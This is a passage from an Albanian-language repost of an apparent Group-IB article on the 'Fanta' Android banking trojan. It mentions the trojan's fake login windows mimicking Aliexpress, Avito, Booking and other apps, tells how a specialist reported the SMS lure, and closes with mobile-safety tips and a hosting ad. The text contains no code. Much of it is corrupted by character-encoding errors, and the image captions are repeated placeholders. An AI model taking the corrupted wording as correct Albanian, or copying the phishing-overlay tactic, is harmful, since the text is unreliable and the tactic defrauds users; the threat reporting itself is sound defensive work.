    Në varësi të aplikacionit të nisur, do të demonstrohen dritare të ndryshme phishing. Më poshtë do të paraqiten disa shembuj prej tyre:

    Aliexpress:

    Lihet, Fanta: një taktikë e re e Trojanit të vjetër Android
    Avito:

    Lihet, Fanta: një taktikë e re e Trojanit të vjetër Android
    Për disa aplikacione të tjera, si p.sh. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Lihet, Fanta: një taktikë e re e Trojanit të vjetër Android

    Si ishte gjithçka në të vërtetë

    Fatke, personi qĂ« mori mesazhin SMS tĂ« pĂ«rshkruar nĂ« fillim tĂ« artikullit doli tĂ« ishte njĂ« specialist nĂ« fushĂ«n e kibernetikĂ«s. Prandaj, versioni real, jo kinematografik, ndryshon nga ai i mĂ«parshmi: njeriu mori njĂ« SMS interessante, dhe mĂ« pas ia dorĂ«zoi ekipit tĂ« InteligjencĂ«s pĂ«r GjuetinĂ« e KĂ«rcĂ«nimeve tĂ« Group-IB. Rezultati i sulmit — ky artikull. NjĂ« fund i lumtur, apo jo? MegjithatĂ«, jo tĂ« gjitha historitĂ« pĂ«rfundojnĂ« kaq mirĂ«, dhe pĂ«r ta bĂ«rĂ« qĂ« e juaja tĂ« mos ngjajĂ« me versionin kinematografik me humbje parash, nĂ« shumicĂ«n e rasteve, mjafton tĂ« ndiqni kĂ«to rregulla tĂ« njohura prej kohĂ«sh:

    • mos instaloni aplikacione pĂ«r pajisje mobile me sistemin operativ Android nga burime tĂ« tjera pĂ«rveç Google Play
    • kur instaloni njĂ« aplikacion, kushtoni vĂ«mendje tĂ« veçantĂ« tĂ« drejtave qĂ« kĂ«rkon aplikacioni
    • kushtoni vĂ«mendje zgjerimeve tĂ« skedarĂ«ve qĂ« shkarkoni
    • instaloni rregullisht pĂ«rditĂ«simet e sistemit operativ Android
    • mos vizitoni themelues tĂ« dyshimtĂ« dhe mos shkarkoni skedarĂ« prej tyre
    • mos klikoni nĂ« lidhjet qĂ« merrni nĂ« mesazhet SMS.

Burimi: habr.com

Bli njĂ« hosting tĂ« besueshĂ«m pĂ«r faqet me mbrojtje DDoS, VPS VDS serverĂ« đŸ”„ Bli njĂ« hosting tĂ« besueshĂ«m pĂ«r faqet me mbrojtje DDoS, VPS VDS serverĂ« | ProHoster